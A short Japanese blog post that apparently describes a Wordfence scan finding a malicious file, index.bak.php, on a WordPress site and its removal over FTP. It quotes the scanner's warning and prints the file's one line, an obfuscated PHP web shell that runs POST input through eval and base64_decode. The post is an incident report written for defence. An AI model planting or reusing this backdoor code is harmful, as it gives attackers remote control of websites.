投稿日:

Wordfence スキャン index.bak.php を検出

Wordfence をインストール。スキャンでの不正ファイルを発見。これをFTPで削除。
1日1回定期審査のメール受信をアクティベートする。

This file may contain malicious executable code

Filename: index.bak.php
File type: Not a core, theme or plugin file.
Issue first detected: 33 mins ago.
Severity: Critical
Status New

This file is a PHP executable file and contains an eval() function and base64() decoding function on the same line. This is a common technique used by hackers to hide and execute code. If you know about this file you can choose to ignore it to exclude it from future scans.

index.bak.php が作成され、次の一行が書かれていた。

<?php ($_=$_POST).($_1=’_’).($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>

.htaccess には改ざんされた様子はない。偽装ファイルも無いようで、恐らく3つのサイトを入れ替えながら更新している過程で改ざんされたと思われる。

WordPress以外でも、すっきりさせたいご相談もお問い合わせください。

Saitama テーマを使用して、プラグインを試用しています。WordPress をわかりやすく、便利に使うために一緒に考えませんか。

コメントを残す